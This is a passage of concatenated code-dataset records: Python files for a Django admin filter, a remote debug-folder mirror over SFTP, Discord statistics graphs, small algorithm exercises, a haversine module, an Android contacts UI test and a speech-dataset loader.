ProductAdminFilter))\r\nFilterSpec.filter_specs.insert(0, (lambda f: bool(f.rel and hasattr(f, 'category_admin_filter')), CategoryAdminFilter))\r\n#FilterSpec.filter_specs.insert(0, (lambda f: getattr(f, 'category_admin_filter', False), CategoryAdminFilter))\r\n\r\n","sub_path":"product/customfilters.py","file_name":"customfilters.py","file_ext":"py","file_size_in_byte":2717,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"437529416","text":"'''\nCreated on Mar 12, 2013\n\n@author: Giacomo Mc Evoy\n'''\n\nimport sys\nimport re\n\ndef run():\n \n # Read filename from args\n filename = sys.argv[1]\n\n # open file and read it\n aFile = open(filename, 'r')\n text = aFile.read()\n \n # get the repeated filenames\n repeatedNames = re.split('\\\\n', text)\n \n # work on repeated filenames\n names = unique(repeatedNames)\n\n # output to 
another file\n outputName = sys.argv[2]\n output = open(outputName, 'w')\n writeNames(output, names)\n \ndef unique(repeatedNames):\n uniques = []\n \n # boundary condition: empty list\n if len(repeatedNames) == 0:\n return uniques\n \n # sort makes things easier\n repeatedNames = sorted(repeatedNames)\n\n # add the rest\n for s in repeatedNames:\n\n # condition of empty name (due to split)\n if len(s) == 0:\n continue\n\n # boundary condition for first element \n if len(uniques) == 0:\n uniques.append(s)\n continue\n \n # add the rest \n size = len(uniques)\n if uniques[size - 1] != s:\n # this node name has not been added yet\n uniques.append(s);\n \n return uniques;\n\ndef writeNames(output, names):\n \n for name in names:\n output.write(name + '\\n')\n output.close()\n\n# Do this when attempting to run module\nif __name__ == '__main__':\n run()\n","sub_path":"monitor/nodenames.py","file_name":"nodenames.py","file_ext":"py","file_size_in_byte":1410,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"559761322","text":"import paramiko\nfrom threading import Timer\nimport os, os.path as op, pathlib, fnmatch\nfrom datetime import datetime\n\nfrom ssh_credentials import SSH_USER, SSH_PORT, SSH_HOST, SSH_KEY\n\nREMOTE_FOLDER = '/tmp/remdeb/'\nLOCAL_FOLDER = 'D:\\\\edu\\\\UniBonn\\\\Study\\\\thesis\\\\codes\\\\NSVF\\\\remdeb\\\\'\nINTERVAL = 5 # in seconds\n\nFILTER = '*.rmdb'\n\n\n# Start connection\nclient = paramiko.SSHClient()\nclient.load_system_host_keys()\nclient.load_host_keys(SSH_KEY)\nclient.connect(SSH_HOST, SSH_PORT, SSH_USER)\nsftp = client.open_sftp()\n\n# Change dir to remote_folder or create if not existing\ntry:\n\tsftp.chdir(REMOTE_FOLDER)\nexcept IOError:\n\tsftp.mkdir(REMOTE_FOLDER)\n\tsftp.chdir(REMOTE_FOLDER)\n\n# Prepare local directory\nif not op.exists(LOCAL_FOLDER):\n\tos.makedirs(LOCAL_FOLDER)\n\nfileList = {f: pathlib.Path(op.join(LOCAL_FOLDER, f)).stat() \\\n\t\t\tfor f in os.listdir(LOCAL_FOLDER) if op.isfile(op.join(LOCAL_FOLDER, f))}\n\n# Function of watchdog to be executed each INTERVAL seconds\ndef watchFolder():\n\tprint(datetime.now().strftime(\"%H:%M:%S\"))\n\tTimer(INTERVAL, watchFolder).start()\n\n\tremoteDir = {f: sftp.lstat(f) for f in sftp.listdir()}\n\n\tfor f in remoteDir:\n\t\tlstat = remoteDir[f]\n\t\t# Only filter files\n\t\tif 'd' in str(lstat).split()[0] or not fnmatch.fnmatch(f, FILTER):\n\t\t\tcontinue\n\n\t\tif f not in fileList or fileList[f].st_mtime < lstat.st_mtime:\n\t\t\tprint('> {}'.format(f))\n\t\t\tsftp.get(op.join(REMOTE_FOLDER, f), op.join(LOCAL_FOLDER, f))\n\t\t\tfileList.update({f: pathlib.Path(op.join(LOCAL_FOLDER, f)).stat()})\n\nwatchFolder()","sub_path":"util/remote_debugger/mirror_folder.py","file_name":"mirror_folder.py","file_ext":"py","file_size_in_byte":1515,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"333087586","text":"\nimport sys\n\nimport matplotlib.patches as mpatches\nfrom Core.Fonctions.GetNom import getNomGraph\nfrom Core.Fonctions.GraphTheme import setThemeGraph\nfrom Core.Fonctions.VoiceAxe import voiceAxe\nfrom matplotlib import pyplot as plt\nimport matplotlib.patches\nfrom Stats.SQL.ConnectSQL import 
connectSQL\n\ncolorOT=(110/256,200/256,250/256,1)\ntableauMois={\"01\":\"janvier\",\"02\":\"février\",\"03\":\"mars\",\"04\":\"avril\",\"05\":\"mai\",\"06\":\"juin\",\"07\":\"juillet\",\"08\":\"aout\",\"09\":\"septembre\",\"10\":\"octobre\",\"11\":\"novembre\",\"12\":\"décembre\",\"TO\":\"TOTAL\",\"1\":\"janvier\",\"2\":\"février\",\"3\":\"mars\",\"4\":\"avril\",\"5\":\"mai\",\"6\":\"juin\",\"7\":\"juillet\",\"8\":\"aout\",\"9\":\"septembre\",\"janvier\":\"01\",\"février\":\"02\",\"mars\":\"03\",\"avril\":\"04\",\"mai\":\"05\",\"juin\":\"06\",\"juillet\":\"07\",\"aout\":\"08\",\"septembre\":\"09\",\"octobre\":\"10\",\"novembre\":\"11\",\"décembre\":\"12\",\"to\":\"TO\",\"glob\":\"GL\"}\ndictYAx={\"Salons\":\"Salons\",\"Freq\":\"Heures\",\"Emotes\":\"Emotes\",\"Reactions\":\"Réactions\",\"Voicechan\":\"Salons\",\"Messages\":\"Membres\",\"Voice\":\"Membres\",\"Mots\":\"Membres\"}\n\ndef graphGroupedCompare(ligne,ctx,option,bot,guildOT,curseur):\n colors={ligne[\"AuthorID\"]:colorOT,int(ligne[\"Args4\"]):colorOT}\n noms={ligne[\"AuthorID\"]:\"Ancien membre\",int(ligne[\"Args4\"]):\"Ancien membre\"}\n author,table=ligne[\"AuthorID\"],ligne[\"AuthorID\"]\n table=curseur.execute(\"SELECT * FROM perso{0}{1}{2} ORDER BY Count DESC LIMIT 10\".format(ligne[\"Args2\"],ligne[\"Args3\"],ligne[\"AuthorID\"])).fetchall()\n listeX,listeY,listeSN,listeSX,listeA=[],[],[],[],[]\n pos=0\n setThemeGraph(plt)\n plt.subplots(figsize=(6.4,4.8))\n for i in range(len(table)):\n if option in (\"Salons\",\"Voicechan\"):\n if guildOT.chan[table[i][\"ID\"]][\"Hide\"]:\n continue\n center=0\n listeX.append(pos)\n listeY.append(table[i][\"Count\"])\n listeA.append(author)\n pos+=1\n center+=1\n\n count=curseur.execute(\"SELECT * FROM perso{0}{1}{2} WHERE ID={3}\".format(ligne[\"Args2\"],ligne[\"Args3\"],ligne[\"Args4\"],table[i][\"ID\"])).fetchone()\n if count!=None:\n listeY.append(count[\"Count\"])\n listeA.append(int(ligne[\"Args4\"]))\n listeX.append(pos)\n pos+=1\n center+=1\n\n listeSX.append(pos-center//2-1)\n try:\n listeSN.append(getNomGraph(ctx,bot,option,table[i][\"ID\"]))\n except:\n listeSN.append(\"??\")\n pos+=0.75\n\n voiceAxe(option,listeY,plt,\"y\")\n user1=ctx.guild.get_member(author)\n user2=ctx.guild.get_member(int(ligne[\"Args4\"]))\n\n if user1!=None:\n colors[user1.id]=(user1.color.r/256,user1.color.g/256,user1.color.b/256,1)\n noms[user1.id]=user1.name\n if user2!=None:\n colors[user2.id]=(user2.color.r/256,user2.color.g/256,user2.color.b/256,1)\n noms[user2.id]=user2.name\n\n if colors[ligne[\"AuthorID\"]]==colors[int(ligne[\"Args4\"])]:\n colors[int(ligne[\"Args4\"])]=(colors[int(ligne[\"Args4\"])][0],colors[int(ligne[\"Args4\"])][1],colors[int(ligne[\"Args4\"])][2],0.5)\n\n plt.bar(listeX, listeY, color=[colors[i] for i in listeA], width=1, edgecolor='white')\n plt.xticks(listeSX, listeSN,rotation=45)\n plt.xlabel(dictYAx[option])\n\n for i in range(len(listeY)):\n plt.text(x=listeX[i], y=listeY[i], s=listeY[i], size=8, ha=\"center\")\n\n plt.legend([matplotlib.patches.Patch(color=colors[ligne[\"AuthorID\"]]),matplotlib.patches.Patch(color=colors[int(ligne[\"Args4\"])])],[noms[ligne[\"AuthorID\"]],noms[int(ligne[\"Args4\"])]])\n\n if table[0][\"Annee\"]==\"GL\":\n titre=\"Classement global - {0} - {1}\".format(ctx.guild.name,option) \n else:\n titre=\"Classement {0} 20{1} - {2} - {3}\".format(tableauMois[table[0][\"Mois\"]],table[0][\"Annee\"],ctx.guild.name,option)\n\n plt.title(\"Groupement comparaison\\n{0} - {1}/{2}\".format(option,ligne[\"Args2\"],ligne[\"Args3\"]))\n plt.tight_layout()\n 
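# the finished figure goes to the shared output file; plt.clf() then resets\n    # pyplot's implicit figure so the next command starts from a blank state\n    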
plt.savefig(\"Graphs/otGraph\")\n plt.clf()\n\n\n\ndef graphGroupedComparePerso(ligne,ctx,option,bot,guildOT):\n liste1=ligne[\"Args1\"].split(\" \")\n liste2=ligne[\"Args2\"].split(\" \")\n colors=[colorOT,\"green\"]\n \n author=ligne[\"AuthorID\"]\n obj=ligne[\"Args3\"]\n if obj==\"None\":\n obj=\"\"\n tempOption=option\n if obj!=\"\":\n if option==\"Voicechan\":\n option=\"Voice\"\n else:\n option=\"Messages\"\n\n if ligne[\"Commande\"]==\"compareServ\":\n noms=[\"{0}/{1}\".format(tableauMois[liste1[0]],liste1[1]),\"{0}/{1}\".format(tableauMois[liste2[0]],liste2[1])]\n connexion1,curseur1=connectSQL(ctx.guild.id,tempOption,\"Stats\",tableauMois[liste1[0]],liste1[1])\n connexion2,curseur2=connectSQL(ctx.guild.id,tempOption,\"Stats\",tableauMois[liste2[0]],liste2[1])\n table=curseur1.execute(\"SELECT * FROM {0}{1}{2} ORDER BY Count DESC LIMIT 10\".format(liste1[0],liste1[1],obj)).fetchall()\n else:\n noms=[\"{0}/{1}\".format(liste1[0],liste1[1]),\"{0}/{1}\".format(liste2[0],liste2[1])]\n connexion1,curseur1=connectSQL(ctx.guild.id,option,\"Stats\",liste1[0],liste1[1])\n connexion2,curseur2=connectSQL(ctx.guild.id,option,\"Stats\",liste2[0],liste2[1])\n table=curseur1.execute(\"SELECT * FROM perso{0}{1}{2} ORDER BY Count DESC LIMIT 10\".format(liste1[0],liste1[1],author)).fetchall()\n listeX,listeY,listeSN,listeSX,listeA=[],[],[],[],[]\n pos=0\n setThemeGraph(plt)\n plt.subplots(figsize=(6.4,4.8))\n for i in range(len(table)):\n if option in (\"Messages\",\"Mots\",\"Voice\") or obj!=\"\":\n if guildOT.users[table[i][\"ID\"]][\"Hide\"]:\n continue\n elif option in (\"Salons\",\"Voicechan\"):\n if guildOT.chan[table[i][\"ID\"]][\"Hide\"]:\n continue\n center=0\n listeX.append(pos)\n listeY.append(table[i][\"Count\"])\n listeA.append(0)\n pos+=1\n center+=1\n\n if ligne[\"Commande\"]==\"compareServ\":\n count=curseur2.execute(\"SELECT * FROM {0}{1}{2} WHERE ID={3}\".format(liste2[0],liste2[1],obj,table[i][\"ID\"])).fetchone()\n else:\n count=curseur2.execute(\"SELECT * FROM perso{0}{1}{2} WHERE ID={3}\".format(liste2[0],liste2[1],author,table[i][\"ID\"])).fetchone()\n if count!=None:\n listeY.append(count[\"Count\"])\n listeA.append(1)\n listeX.append(pos)\n pos+=1\n center+=1\n\n listeSX.append(pos-center//2-1)\n try:\n nom=getNomGraph(ctx,bot,option,table[i][\"ID\"])\n if obj!=\"\" or option in (\"Messages\",\"Voice\",\"Mots\"):\n nom=nom.name\n if len(nom)>15:\n nom=nom[0:15]+\"...\"\n listeSN.append(nom)\n except:\n listeSN.append(\"??\")\n \n pos+=0.75\n\n voiceAxe(option,listeY,plt,\"y\")\n\n plt.bar(listeX, listeY, color=[colors[i] for i in listeA], width=1, edgecolor='white')\n plt.xticks(listeSX, listeSN,rotation=45)\n plt.xlabel(dictYAx[option])\n\n for i in range(len(listeY)):\n plt.text(x=listeX[i], y=listeY[i], s=listeY[i], size=8, ha=\"center\")\n\n plt.legend([matplotlib.patches.Patch(color=colors[0]),matplotlib.patches.Patch(color=colors[1])],[noms[0],noms[1]])\n\n plt.title(\"Groupement comparaison\\n{0}\".format(tempOption))\n plt.tight_layout()\n plt.savefig(\"Graphs/otGraph\")\n plt.clf()\n\n\ndef graphGroupedCompareRank(ligne,ctx,option,bot,guildOT):\n mois,annee=ligne[\"Args1\"],ligne[\"Args2\"]\n obj1,obj2=ligne[\"Args3\"],ligne[\"Args4\"]\n colors=[colorOT,\"green\"]\n noms=[getNomGraph(ctx,bot,option,int(obj1)),getNomGraph(ctx,bot,option,int(obj2))]\n\n connexion,curseur=connectSQL(ctx.guild.id,option,\"Stats\",tableauMois[mois],annee)\n table=curseur.execute(\"SELECT * FROM {0}{1}{2} ORDER BY Count DESC LIMIT 10\".format(mois,annee,obj1)).fetchall()\n\n 
listeX,listeY,listeSN,listeSX,listeA=[],[],[],[],[]\n    pos=0\n    setThemeGraph(plt)\n    plt.subplots(figsize=(6.4,4.8))\n    for i in range(len(table)):\n        if guildOT.users[table[i][\"ID\"]][\"Hide\"]:\n            continue\n        center=0\n        listeX.append(pos)\n        listeY.append(table[i][\"Count\"])\n        listeA.append(0)\n        pos+=1\n        center+=1\n\n        count=curseur.execute(\"SELECT * FROM {0}{1}{2} WHERE ID={3}\".format(mois,annee,obj2,table[i][\"ID\"])).fetchone()\n        if count!=None:\n            listeY.append(count[\"Count\"])\n            listeA.append(1)\n            listeX.append(pos)\n            pos+=1\n            center+=1\n\n        listeSX.append(pos-center//2-1)\n        try:\n            nom=getNomGraph(ctx,bot,\"Messages\",table[i][\"ID\"]).name\n            if len(nom)>15:\n                nom=nom[0:15]+\"...\"\n            listeSN.append(nom)\n        except:\n            listeSN.append(\"??\")\n\n        pos+=0.75\n\n    voiceAxe(option,listeY,plt,\"y\")\n\n    plt.bar(listeX, listeY, color=[colors[i] for i in listeA], width=1, edgecolor='white')\n    plt.xticks(listeSX, listeSN,rotation=45)\n    plt.xlabel(\"Membres\")\n\n    for i in range(len(listeY)):\n        plt.text(x=listeX[i], y=listeY[i], s=listeY[i], size=8, ha=\"center\")\n\n    plt.legend([matplotlib.patches.Patch(color=colors[0]),matplotlib.patches.Patch(color=colors[1])],[noms[0],noms[1]])\n\n    if table[0][\"Annee\"]==\"GL\":\n        plt.title(\"Groupement comparaison\\n{0} - Période globale\".format(option))\n    else:\n        plt.title(\"Groupement comparaison\\n{0} - {1} 20{2}\".format(option,tableauMois[table[0][\"Mois\"]],table[0][\"Annee\"]))\n\n    plt.tight_layout()\n    plt.savefig(\"Graphs/otGraph\")\n    plt.clf()","sub_path":"Stats/Graphiques/Compare/GroupedCompare.py","file_name":"GroupedCompare.py","file_ext":"py","file_size_in_byte":9453,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"169499991","text":"# Problem [1181] : Word Sort\n\nn_val = int(input())\nwords = [list(input()) for _ in range(n_val)]\nresult = list()\nfor word in words:\n    if word not in result:\n        result.append(word)\n\nsorted_list = list(sorted(result,key = lambda x : (len(x),x)))\n\n\nfor word in sorted_list:\n    print(''.join(map(str,word)))","sub_path":"Baekjoon/Sorting/BOJ_1181.py","file_name":"BOJ_1181.py","file_ext":"py","file_size_in_byte":315,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"399416931","text":"def solve(onum, num, st, tries):\n    st = st | set(str(num))\n    if len(st) == 10:\n        return str(num)\n    else:\n        nnum = onum + num\n        if nnum == num or tries == 100000000:\n            return \"INSOMNIA\"\n        return solve(onum, nnum,st,tries+1)\n\n\n\n\n\nf = open('input.txt', 'r')\no = open('output.txt', 'w')\nlines = f.readlines()\nT = int(lines[0])\nfor i in range(T):\n    num = int(lines[i+1].strip())\n    ans = \"Case #\" + str(i+1) + \": \" + solve(num,num,set(\"\"),0)\n    o.write(ans + \"\\n\")\n","sub_path":"codes/CodeJamCrawler/16_0_1_neat/16_0_1_apr_sheep.py","file_name":"16_0_1_apr_sheep.py","file_ext":"py","file_size_in_byte":504,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"552527991","text":"#!/usr/bin/env python\n# Copyright (c) 2014-2018 Michael Hirsch, Ph.D.\n#\n# Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met:\n# 1. Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer.\n# 2. 
Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution.\n# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n\ntry:\n from numpy import cos, arcsin, sqrt, radians, degrees\nexcept ImportError:\n from math import cos,sqrt,radians,degrees\n from math import asin as arcsin\ntry:\n from astropy.coordinates.angle_utilities import angular_separation\nexcept ImportError:\n angular_separation = None\n\"\"\"\nMichael Hirsch\n\nNote: adding decimal points to the constants made 0 difference in %timeit execution time\n\nThe Meeus algorithm is about 9.5% faster than Astropy/Vicenty on my PC,\nand gives virtually identical result\nwithin double precision arithmetic limitations\n\"\"\"\n\n\ndef anglesep_meeus(lon0, lat0, lon1, lat1, deg:bool=True):\n \"\"\"\n inputs: DEGREES (right ascension, declination Meeus p. 109)\n\n\n from \"Astronomical Algorithms\" by Jean Meeus Ch. 16 p. 111 (16.5)\n gives angular distance in degrees between two rightAscension,Declination\n points in the sky. Neglecting atmospheric effects, of course.\n\n Advantage of Meeus haversine method is stability all the way to exactly 0 deg.\n\n assumes degrees input, degrees output\n\n either the arrays must be the same size, or one of them must be a scalar\n \"\"\"\n\n if deg:\n lon0 = radians(lon0)\n lat0 = radians(lat0)\n lon1 = radians(lon1)\n lat1 = radians(lat1)\n\n sep_rad = 2 * arcsin(sqrt( haversine(lat0 - lat1) +\n cos(lat0) * cos(lat1) * haversine(lon0 - lon1)))\n\n if deg:\n return degrees(sep_rad)\n else:\n return sep_rad\n\n\ndef anglesep(lon0, lat0, lon1, lat1, deg:bool=True):\n \"\"\"\n inputs: DEGREES\n\n For reference, this is from astropy astropy/coordinates/angle_utilities.py\n Angular separation between two points on a sphere.\n \"\"\"\n if angular_separation is None:\n raise ImportError('angledist requires AstroPy. Try pure Python angledis_meeus')\n\n if deg:\n lon0 = radians(lon0)\n lat0 = radians(lat0)\n lon1 = radians(lon1)\n lat1 = radians(lat1)\n\n sep_rad = angular_separation(lon0,lat0, lon1, lat1)\n\n if deg:\n return degrees(sep_rad)\n else:\n return sep_rad\n\n\ndef haversine(theta):\n \"\"\"\n Compute haversine of angle theta (radians)\n\n http://en.wikipedia.org/wiki/Haversine\n Meeus p. 
111\n \"\"\"\n return (1 - cos(theta)) / 2.\n","sub_path":"pymap3d/haversine.py","file_name":"haversine.py","file_ext":"py","file_size_in_byte":3575,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"256221844","text":"'''\n@author: wei,xiang\n'''\n\nimport fs_wrapper\nimport settings.common as SC\nfrom case_utility import *\nfrom logging_wrapper import log_test_case, save_fail_log, print_report_line\nfrom test_case_base import TestCaseBase\nfrom qrd_shared.case import *\nimport time\n\n\nclass test_suit_cmcc_devci_contact_case13(TestCaseBase):\n '''\n\n @see: L{TestCaseBase }\n '''\n \n \n def test_case_main(self, case_results):\n global case_flag , TAG, case_flag_add, case_flag_share_visible_contact\n case_flag = False\n case_flag_add = False\n case_flag_share_visible_contact = False\n TAG = \"Dev-ci cases: Contact \"\n log_test_framework(TAG, self.name + \" -Start\")\n \n \"\"\"\n cases contnets you need to add\n \"\"\"\n contact_list = [ ['phoneA', '10086'], ['phoneB', '10087'], ['phoneC', '10088']]\n \n start_activity('com.android.settings', '.Settings')\n settings.set_default_data(1)\n sleep(1)\n settings.set_default_sms(1)\n sleep(1)\n \n # launch contact\n start_activity(\"com.android.contacts\", \"com.android.contacts.activities.PeopleActivity\")\n sleep(1)\n contact.go_home()\n sleep(1) \n \n # click \"All contacts\" sheet to lock view\n click_textview_by_text(SC.PRIVATE_CONTACT_CONTACTS_OPTION, isScrollable=0)\n \n # we need to delete all contact \n contact.contact_to_display()\n local_assert(True, contact.del_all_contact(SC.PRIVATE_CONTACT_PHONE, SC.PRIVATE_CONTACT_SIM1, SC.PRIVATE_CONTACT_SIM2))\n \n log_test_framework(self.name, \"Now add new contact array saved into phone\")\n \n for i in range(0, len(contact_list)):\n scroll_to_top()\n click_imageview_by_desc('add new contact')\n # click_textview_by_id('account_type')\n #sleep(1)\n #click_textview_by_text('PHONE')\n sleep(1)\n contact.add_contact_into_phone(contact_list[i][0], contact_list[i][1])\n sleep(3)\n \n if search_text(contact_list[0][0]) and search_text(contact_list[1][0]) and search_text(contact_list[2][0]) :\n log_test_framework(self.name, \"Contact Array create successfully\")\n case_flag_add = True\n else:\n log_test_framework(self.name, \"Contact Array create failed\")\n case_flag_add = False\n take_screenshot()\n set_cannot_continue()\n \n if can_continue(): \n sleep(2)\n send_key(KEY_MENU)\n # click 'import/export' by index 2\n click_textview_by_text('Import/export', isScrollable=0)\n # click 'Share visible contacts' by index 5\n click_textview_by_index(5)\n sleep(1)\n send_key(KEY_MENU)\n click_textview_by_text('All')\n click_textview_by_desc('Done')\n sleep(2)\n scroll_to_bottom()\n if search_text('Messaging', isScrollable=1, searchFlag=TEXT_STARTS_WITH):\n scroll_to_bottom()\n log_test_framework(self.name, 'Frist time to use this function')\n click_textview_by_text('Messaging')\n click_textview_by_text('Just once')\n if search_text('Share with Messaging', isScrollable=0, searchFlag=TEXT_CONTAINS):\n log_test_framework(self.name, 'This function have been used')\n click_textview_by_text('Just once')\n # it will jump to Messager App\n if wait_for_fun(lambda:(search_view_by_id('send_button_mms')), True, 10) :\n log_test_framework(self.name, \"jump to messager successfully\")\n entertext_edittext_on_focused(SC.PUBLIC_SLOT2_PHONE_NUMBER)\n log_test_framework(self.name, \"Before Send time : \" + time.strftime(\"%I:%M:%S\"))\n 
click_imageview_by_id('send_button_mms')\n func = lambda:search_text('sent', searchFlag=TEXT_CONTAINS)\n if wait_for_fun(func, True, 30):\n log_test_framework(self.name, \"shared vcf sent successfully\")\n log_test_framework(self.name, \"Send out time : \" + time.strftime(\"%I:%M:%S\"))\n case_flag_share_visible_contact = True\n else:\n log_test_framework(self.name, \"shared vcf sent failed\")\n case_flag_share_visible_contact = False\n else:\n log_test_framework(self.name, \"jump to messager failed\")\n take_screenshot()\n set_cannot_continue()\n goback()\n sleep(5)\n \n case_flag = case_flag_add and case_flag_share_visible_contact\n \n \n if case_flag:\n qsst_log_case_status(STATUS_SUCCESS, \"\" , SEVERITY_HIGH)\n else:\n qsst_log_case_status(STATUS_FAILED, \"\", SEVERITY_HIGH)\n \n case_results.append((self.case_config_map[fs_wrapper.CASE_NAME_ATTR], case_flag))\n \n \n def test_case_end(self):\n '''\n record the case result\n\n '''\n log_test_case(self.case_config_map[fs_wrapper.CASE_NAME_ATTR], TAG + ' : end')\n if can_continue() and case_flag == True:\n # shutdown()\n log_test_case(self.case_config_map[fs_wrapper.CASE_NAME_ATTR], TAG + ': case pass')\n print_report_line(self.case_config_map[fs_wrapper.CASE_NAME_ATTR] + TAG + ' : \\tpass')\n else:\n log_test_case(self.case_config_map[fs_wrapper.CASE_NAME_ATTR], TAG + ' : case fail')\n print_report_line(self.case_config_map[fs_wrapper.CASE_NAME_ATTR] + TAG + ' : \\tfail')\n save_fail_log()\n \n","sub_path":"Source/QSST/Config/data/L/test_env/test_suit_cmcc_devci_contact/test_suit_cmcc_devci_contact_case13.py","file_name":"test_suit_cmcc_devci_contact_case13.py","file_ext":"py","file_size_in_byte":5736,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"651606577","text":"from os import path\n\nimport argparse\nimport os\nimport shutil\n\nparser = argparse.ArgumentParser()\nparser.add_argument('src_dir', type=str)\nparser.add_argument('dst_dir', type=str)\nargs = parser.parse_args()\n\nif not path.exists(args.dst_dir):\n os.makedirs(args.dst_dir)\n\nlog_txt = 'treelog.txt'\nsrc_log = path.join(args.src_dir, log_txt)\ndst_log = path.join(args.dst_dir, log_txt)\nshutil.copyfile(src_log, dst_log)\n\nwith open(src_log, 'r') as fin:\n log = fin.read().strip()\n\nfor block in log.split('\\n\\n'):\n node_dir = 'Node_' + block.split('\\n')[0]\n src_node = path.join(args.src_dir, node_dir)\n dst_node = path.join(args.dst_dir, node_dir)\n if not path.exists(dst_node):\n os.makedirs(dst_node)\n\n att = 'fir.fs.fs.attr'\n shutil.copyfile(path.join(src_node, att), path.join(dst_node, att))\n\n core = 'core_features.txt'\n shutil.copyfile(path.join(src_node, core), path.join(dst_node, core))\n\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"firtree/ranker/arribada/init_firtree.py","file_name":"init_firtree.py","file_ext":"py","file_size_in_byte":913,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"592036425","text":"# Copyright (c) 2021 Graphcore Ltd. 
All Rights Reserved.\n# Copyright 2020 Minh Nguyen (@dathudeptrai)\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n#\n# This file has been modified by Graphcore Ltd.\n\"\"\"\nThe function `average_by_duration`and `_norm_mean_std` were copied from\nhttps://github.com/TensorSpeech/TensorFlowTTS/blob/v1.8/examples/fastspeech2/fastspeech2_dataset.py\n\"\"\"\nimport os\nimport json\nimport logging\nimport numpy as np\nimport tensorflow as tf\n\n\nlogging.basicConfig(\n level=logging.INFO,\n format='%(asctime)s.%(msecs)06d: %(levelname)-1.1s %(message)s',\n datefmt='%Y-%m-%d %H:%M:%S')\nlogger = logging.getLogger(__name__)\n\n\ndef average_by_duration(x, durs):\n durs = durs.astype(np.int32)\n mel_len = durs.sum()\n durs_cum = np.cumsum(np.pad(durs, (1, 0))) # pad 0 to the start\n\n # calculate charactor f0/energy\n x_char = np.zeros((durs.shape[0],), dtype=np.float32)\n for idx, start, end in zip(range(mel_len), durs_cum[:-1], durs_cum[1:]):\n values = x[start:end][np.where(x[start:end] != 0.0)[0]]\n x_char[idx] = np.mean(values) if len(values) > 0 else 0.0\n return x_char.astype(np.float32)\n\n\nclass LJSpeechDataset(object):\n \"\"\"Dataloader for phoneme-level datasets.\"\"\"\n\n def __init__(self, opts, is_train=True):\n self.opts = opts\n self.is_train = is_train\n self.dtype = tf.float16 if opts[\"precision\"] == \"16\" else tf.float32\n self.np_dtype = np.float16 if opts[\"precision\"] == \"16\" else np.float32\n self.max_seq_len = opts[\"max_seq_length\"]\n self.max_mel_length = opts[\"max_wave_length\"]\n self.filenames = []\n if not self.opts[\"generated_data\"] and self.opts[\"data_path\"]:\n files_path = os.path.join(self.opts[\"data_path\"], \"train.txt\") if self.is_train else os.path.join(\n self.opts[\"data_path\"], \"val.txt\")\n with open(os.path.abspath(files_path)) as fp:\n for line in fp.readlines():\n self.filenames.append(line.strip())\n if is_train:\n np.random.shuffle(self.filenames)\n\n def __len__(self):\n if self.opts[\"generated_data\"]:\n return 10000\n return len(self.filenames)\n\n def _load_data(self, filename):\n phoneme = np.load(os.path.join(\n self.opts[\"data_path\"], \"phone\", f\"phn-{filename}.npy\")).astype(np.int32)\n duration = np.load(os.path.join(\n self.opts[\"data_path\"], \"duration\", f\"duration-{filename}.npy\")).astype(self.np_dtype)\n pitch = np.load(os.path.join(\n self.opts[\"data_path\"], \"pitch\", f\"pitch-{filename}.npy\")).astype(self.np_dtype)\n energy = np.load(os.path.join(\n self.opts[\"data_path\"], \"energy\", f\"energy-{filename}.npy\")).astype(self.np_dtype)\n mel = np.load(os.path.join(\n self.opts[\"data_path\"], \"mel\", f\"mel-{filename}.npy\")).astype(self.np_dtype)\n return phoneme, duration, pitch, energy, mel\n\n def _fake_duration(self, phn_len, mel_len):\n dur = [mel_len//phn_len]*phn_len\n balance = sum(dur) - mel_len\n dur[-1] += balance\n return np.array(dur).astype(np.int32)\n\n def _generated_generator(self):\n while True:\n phoneme = np.random.randint(0, self.max_seq_len,\n 
